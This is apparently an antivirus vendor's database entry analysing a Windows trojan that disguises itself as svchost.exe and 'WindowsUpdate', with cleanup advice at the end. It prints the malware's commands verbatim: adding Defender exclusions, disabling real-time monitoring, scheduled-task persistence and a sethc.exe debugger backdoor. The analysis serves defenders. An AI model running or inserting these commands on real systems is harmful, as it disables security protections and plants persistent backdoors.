JavaScript support is required for our site to be fully operational in your browser.
Trojan.Siggen34.17993
Added to the Dr.Web virus database:
2026-09-21
Virus description added:
2026-09-23
Technical Information
To ensure autorun and distribution
Modifies the following registry keys
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'WindowsUpdate' = '%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe'
Creates or modifies the following files
%APPDATA%\microsoft\windows\start menu\programs\startup\windowsupdate.exe
<SYSTEM32>\tasks\windowsupdate
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion:
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '<Full path to file>' -ErrorAction SilentlyContinue"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Caches' -ErrorAction SilentlyContinue"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe' -ErrorAction SilentlyContinue"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%WINDIR%\Temp' -ErrorAction SilentlyContinue"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public' -ErrorAction SilentlyContinue"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'svchost.exe' -ErrorAction SilentlyContinue"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'WindowsUpdate.exe' -ErrorAction SilentlyContinue"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue"
Patches code
in AMSI dll
qgkccck.exe process, Amsi.dll module
in NTDLL dll
qgkccck.exe process, ntdll.dll module
Modifies file system
Creates the following files
%TEMP%\mc_av.ps1
nul
%ALLUSERSPROFILE%\microsoft\windows\caches\svchost.exe
%TEMP%\mc_wmi.ps1
Sets the 'hidden' attribute to the following files
%ALLUSERSPROFILE%\microsoft\windows\caches\svchost.exe
Deletes following files that it created itself
%TEMP%\mc_av.ps1
%TEMP%\mc_wmi.ps1
Network activity
Connects to
'ip##pi.com':80
'85.##.167.71':80
TCP
HTTP GET requests
http://ip##pi.com/json/?fi#####################################################################################
Other
UDP
Miscellaneous
Creates and executes the following
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\mc_av.ps1"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\mc_wmi.ps1"
Executes the following
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\mc_av.ps1"
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '<Full path to file>' -ErrorAction SilentlyContinue"
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "<Full path to file>" /t REG_DWORD /d 0 /f 2>nul
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "<Full path to file>" /t REG_DWORD /d 0 /f
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Caches' -ErrorAction SilentlyContinue"
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Microsoft\Windows\Caches" /t REG_DWORD /d 0 /f 2>nul
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Microsoft\Windows\Caches" /t REG_DWORD /d 0 /f
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe' -ErrorAction SilentlyContinue"
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /t REG_DWORD /d 0 /f 2>nul
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /t REG_DWORD /d 0 /f
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%WINDIR%\Temp' -ErrorAction SilentlyContinue"
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%WINDIR%\Temp" /t REG_DWORD /d 0 /f 2>nul
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%WINDIR%\Temp" /t REG_DWORD /d 0 /f
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public' -ErrorAction SilentlyContinue"
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public" /t REG_DWORD /d 0 /f 2>nul
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public" /t REG_DWORD /d 0 /f
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'svchost.exe' -ErrorAction SilentlyContinue"
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes" /v "svchost.exe" /t REG_DWORD /d 0 /f 2>nul
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes" /v "svchost.exe" /t REG_DWORD /d 0 /f
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'WindowsUpdate.exe' -ErrorAction SilentlyContinue"
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes" /v "WindowsUpdate.exe" /t REG_DWORD /d 0 /f 2>nul
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes" /v "WindowsUpdate.exe" /t REG_DWORD /d 0 /f
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue"
'<SYSTEM32>\cmd.exe' /c wmic path win32_VideoController get name
'<SYSTEM32>\wbem\wmic.exe' path win32_VideoController get name
'<SYSTEM32>\cmd.exe' /c schtasks /create /tn "WindowsUpdate" /tr "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /sc onlogon /rl highest /f
'<SYSTEM32>\schtasks.exe' /create /tn "WindowsUpdate" /tr "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /sc onlogon /rl highest /f
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\mc_wmi.ps1"
'<SYSTEM32>\wbem\wmiapsrv.exe'
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /f
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /f
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\mc_av.ps1"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '<Full path to file>' -ErrorAction SilentlyContinue"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "<Full path to file>" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Caches' -ErrorAction SilentlyContinue"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Microsoft\Windows\Caches" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe' -ErrorAction SilentlyContinue"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%WINDIR%\Temp' -ErrorAction SilentlyContinue"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%WINDIR%\Temp" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public' -ErrorAction SilentlyContinue"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'svchost.exe' -ErrorAction SilentlyContinue"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes" /v "svchost.exe" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'WindowsUpdate.exe' -ErrorAction SilentlyContinue"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes" /v "WindowsUpdate.exe" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c wmic path win32_VideoController get name' (with hidden window)
'<SYSTEM32>\cmd.exe' /c schtasks /create /tn "WindowsUpdate" /tr "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /sc onlogon /rl highest /f' (with hidden window)
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\mc_wmi.ps1"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /f' (with hidden window)
Curing recommendations
Windows
macOS
Linux
Android
If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space .
If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.
If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
Switch off your device and turn it on as normal.
Find out more about Dr.Web for Android
このウェブサイトを継続して訪問する場合、訪問者に関する統計データを収集するためのCookieファイルおよび他のテクノロジーを弊社が利用することに同意したものとします。詳細
OK